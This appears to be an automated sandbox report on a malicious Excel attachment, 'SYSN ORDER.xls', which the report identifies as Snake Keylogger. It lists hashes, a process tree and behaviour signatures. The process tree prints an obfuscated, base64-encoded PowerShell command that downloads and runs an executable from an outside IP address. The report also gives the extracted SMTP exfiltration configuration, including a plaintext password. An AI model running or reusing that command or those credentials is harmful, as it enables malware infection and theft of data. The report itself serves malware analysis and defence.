Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-09-2024 07:52
Static task
static1
Behavioral task
behavioral1
Sample
SYSN ORDER.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
SYSN ORDER.xls
Resource
win10v2004-20240802-en
General
-
Target
SYSN ORDER.xls
-
Size
641KB
-
MD5
673bd0aa988ca4a1ef05edb3d5b68d60
-
SHA1
4b7d31c4d6a4cd94e95fdd7c35bca86f6e13ec38
-
SHA256
9db5ab81cbe373ea471f128ad2fdc98c9eb98c1ff3991046f7ca54823d9a6107
-
SHA512
0af25507fd68eb9e8a9df4b1a93f6fad31429d0c0d37d326482ace999f5859f18ef3521c7e71146f41afcf45e7bbaf0d1d77543cc8abfb9c38ac2057cca9929c
-
SSDEEP
12288:GOyBFRSc/ol3o3+io8tM7qgSwaY0c6bde1bmnyqkZH1:GTBShxE+iokM7qgadcgdwmlkZ
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/2000-64-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2000-65-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2000-66-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2896 mshta.exe 11 2896 mshta.exe 13 2304 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2304 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2312 dllhost.exe -
Loads dropped DLL 1 IoCs
pid Process 2304 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0006000000019613-56.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2312 set thread context of 2000 2312 dllhost.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2236 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2304 powershell.exe 2304 powershell.exe 2304 powershell.exe 2000 RegSvcs.exe 2000 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2312 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2304 powershell.exe Token: SeDebugPrivilege 2000 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2236 EXCEL.EXE 2236 EXCEL.EXE 2236 EXCEL.EXE 2236 EXCEL.EXE 2236 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2896 wrote to memory of 2160 2896 mshta.exe 33 PID 2896 wrote to memory of 2160 2896 mshta.exe 33 PID 2896 wrote to memory of 2160 2896 mshta.exe 33 PID 2896 wrote to memory of 2160 2896 mshta.exe 33 PID 2160 wrote to memory of 2304 2160 cmd.exe 35 PID 2160 wrote to memory of 2304 2160 cmd.exe 35 PID 2160 wrote to memory of 2304 2160 cmd.exe 35 PID 2160 wrote to memory of 2304 2160 cmd.exe 35 PID 2304 wrote to memory of 2028 2304 powershell.exe 36 PID 2304 wrote to memory of 2028 2304 powershell.exe 36 PID 2304 wrote to memory of 2028 2304 powershell.exe 36 PID 2304 wrote to memory of 2028 2304 powershell.exe 36 PID 2028 wrote to memory of 2020 2028 csc.exe 37 PID 2028 wrote to memory of 2020 2028 csc.exe 37 PID 2028 wrote to memory of 2020 2028 csc.exe 37 PID 2028 wrote to memory of 2020 2028 csc.exe 37 PID 2304 wrote to memory of 2312 2304 powershell.exe 39 PID 2304 wrote to memory of 2312 2304 powershell.exe 39 PID 2304 wrote to memory of 2312 2304 powershell.exe 39 PID 2304 wrote to memory of 2312 2304 powershell.exe 39 PID 2312 wrote to memory of 2000 2312 dllhost.exe 40 PID 2312 wrote to memory of 2000 2312 dllhost.exe 40 PID 2312 wrote to memory of 2000 2312 dllhost.exe 40 PID 2312 wrote to memory of 2000 2312 dllhost.exe 40 PID 2312 wrote to memory of 2000 2312 dllhost.exe 40 PID 2312 wrote to memory of 2000 2312 dllhost.exe 40 PID 2312 wrote to memory of 2000 2312 dllhost.exe 40 PID 2312 wrote to memory of 2000 2312 dllhost.exe 40 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\SYSN ORDER.xls"1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2236
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4i81mbd-.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC2D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDC2C.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2020
-
-
-
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2000
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD593fcfb28d2d8208c8733fe59577c6461
SHA178a81a392ba2894c31279b6bface03c6a809d90b
SHA2560eff0c774080f113a3b3a621ccadb92313fc3e947afb39c76ea03da334eb402b
SHA5122f03493fb6d0fe759e7ed8caabe069e7d5e13f94d4da619175abc6a7a12021a227ce31e523f5ed00b859097d5184ff486a99691691162920fdf44fee89d9be8e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD57ca74fe9fb2b67614240af7f9691d21a
SHA1722dd5ce1c9934714f2a0838ef17da01869be5d8
SHA2564bfba8b536c6d5d03cc08033c4b817a1c90833df8651e770e19b0fcbcbba0108
SHA5124a0aa42653238ecaa2dcf62cb63422c151c0f1459e38b53af781cf2a2a4f8bb9d35bcb78a605a41da4179121a128a7a67f738701779f2694a13fc925a5284ea8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\IEnetbokkworkingforupdate[1].hta
Filesize8KB
MD5a63beaf7df124ec89423ccb526998fc1
SHA1397e973479a8e70b3ea6cea2c5a6f4d796364f40
SHA2562e07806ea40e3109f56707486bdb89ba38b7854ea97b988be7dcc9c77a4d2c20
SHA512603d03c65f5c62093bc217b084120d8bf0dcd801d8cc6415f2acaa9ceaeac2e433dfd91383835a7532f29652d69ef801f662f913c0d2518629170d9338889c62
-
Filesize
3KB
MD50b94470a8246bdc895d2785a96af8cf0
SHA12e832ab896fe1f34603964793d8fde00d91d5af0
SHA256fdb2296529eb95b70114487ba5c7657bba15db6db74f63f9c4e5c0e057d40fc3
SHA5129aaf798e50e59480b6092b6700f84e64c9256ae248ac084c65da7a01fa07f1b77f43c647c96539ea913b14afa270a60b3b087a0b32d171325f6fcafca4ea2481
-
Filesize
7KB
MD58aad70af30d4b475c342ed70e7b015ee
SHA10f69f00d8d875f212d951019c862ea8a48cda30f
SHA256e71a26ab25df8b772a8463dd6fe8aaa86de4adf063ac208eeea107952c99e8ab
SHA512b5d3561a6558e8bc22ad7ce6fd39b90456b77aac652de59e13a00e8ef48eddcafce97ce59b9a5dfb198bd090ae15a6a00860812d1e2b00b2d41bb8cafcbb8659
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5a6a522ca131970e2caeb8344640f6340
SHA198f6b70d123e305cf21169d80d633f291740d1b9
SHA25635c08eedfff83450b411bb9e3f0c0afbfcef34d5e2b098e67ec622557d1099f4
SHA512c68d94957a21b900c1a6154cd4106e935bfd03861656210e3c6cd01c3fb5061e74e4697640c7c3ff726a0bb07db17dc2a64c26dc98f0ac9633446a19a836a1c9
-
Filesize
1004KB
MD57f0098dcc054a27f80296adf300573ec
SHA194bd05a8f7b8b79750025d0e9b6407beb2b85c89
SHA256468981a4e110bca0fa99eb08c2fbda0e1482cf8ef5fbb3adcf82db6609aede24
SHA512904adfade566e1404d1d07ec1eb6141e06abdc0b74a803946294124f485f7260de2cbdde32f2abaaa96c0c25f3b476d39887502d5f304b3bc346d314119b1d77
-
Filesize
474B
MD5006d2bdbc05adf8dd13c8c672f8d8bdf
SHA163a2f1d74d732f474251c0278f91df47e3872caf
SHA256979007d0b68b1e466e58daec48283b65d3778cfdae6a40819309d85f0f624a96
SHA512762fef864ad0ff9a168b6925934af3b6b90b0c053da6a62efec831ae9fd2fe54de935851178ec658937b316c2218e79f2d2c49a0c5a84478cdd662c6d72b47ea
-
Filesize
309B
MD5ec96bbe47248f42327026fd7b3e0fae9
SHA11a01d236554f8479cc532f16cce5360960ab2baa
SHA2562fcaed9de88c992fd80c12afc722a9ce7b46da81478f859d3667cd34288c85cb
SHA5128f3a19fa1d12909e7bd8ecfd9859b6f633fe2852d6180b7e40b061b8927bd1daaf092479dca9a2cdf058a0cefedc66acc3dcb9a9164e87ef036bf2749216eb35
-
Filesize
652B
MD515a99ca8ed8d4f4bf640995e767900c2
SHA1d0143fd9d534f211243a5dd325cff25c2a97e2c7
SHA256fafed0cd28d24d42ee18c3fc26d05764dede327fbd640eab7c618a8bd240f9e6
SHA5125d39fa73b8eb13be107cb785a1d23e6b14d33051f51072880b25a435025247b855d5b935010e057c055f5a18f1895ec5e331c439d34be4bbad1b9acebbe694d1